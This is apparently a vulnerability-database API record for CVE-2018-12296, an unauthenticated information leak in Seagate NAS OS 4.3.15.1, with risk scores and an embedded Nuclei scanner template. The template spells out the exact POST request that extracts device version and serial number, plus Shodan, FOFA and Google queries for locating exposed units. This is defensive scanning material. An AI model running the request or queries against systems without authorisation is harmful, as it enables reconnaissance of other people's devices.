{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2018-12296/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2018-12296/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2018-12296/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2018-12296/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2018-12296/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2018-12296"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2018-12296"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.11337,
      "kev": false,
      "percentile": 0.95792
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2018/CVE-2018-12296.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2018-12296\n\ninfo:\n  name: Seagate NAS OS 4.3.15.1 - Server Information Disclosure\n  author: princechaddha\n  severity: high\n  description: Seagate NAS OS version 4.3.15.1 has insufficient access control which allows attackers to obtain information about the NAS without authentication via empty POST requests in /api/external/7.0/system.System.get_infos.\n  impact: |\n    An attacker can gain sensitive information about the server, potentially leading to further attacks.\n  remediation: |\n    Upgrade to a patched version of Seagate NAS OS.\n  reference:\n    - https://blog.securityevaluators.com/invading-your-personal-cloud-ise-labs-exploits-the-seagate-stcr3000101-ecf89de2170\n    - https://nvd.nist.gov/vuln/detail/CVE-2018-12296\n    - https://github.com/ARPSyndicate/kenzer-templates\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2018-12296\n    cwe-id: CWE-732\n    epss-score: 0.11337\n    epss-percentile: 0.95792\n    cpe: cpe:2.3:o:seagate:nas_os:4.3.15.1:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: seagate\n    product: nas_os\n    shodan-query: http.title:\"seagate nas - seagate\"\n    fofa-query: title=\"seagate nas - seagate\"\n    google-query: intitle:\"seagate nas - seagate\"\n  tags: cve,cve2018,seagate,nasos,disclosure,unauth,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /api/external/7.0/system.System.get_infos HTTP/1.1\n        Host: {{Hostname}}\n        Referer: {{BaseURL}}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - '\"version\":'\n          - '\"serial_number\":'\n        condition: and\n\n    extractors:\n      - type: regex\n        group: 1\n        regex:\n          - '\"version\": \"([0-9.]+)\"'\n        part: body\n# digest: 4b0a004830460221009e1d9dc0fe4786fcf6c15cf2150e41c81e1af2654216b07a11c37311258525bd0221008185a78898d28f9b489405a1cc1a91508e5a91f1d693ea534889f3dc60f52f1b:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2018-12296"
}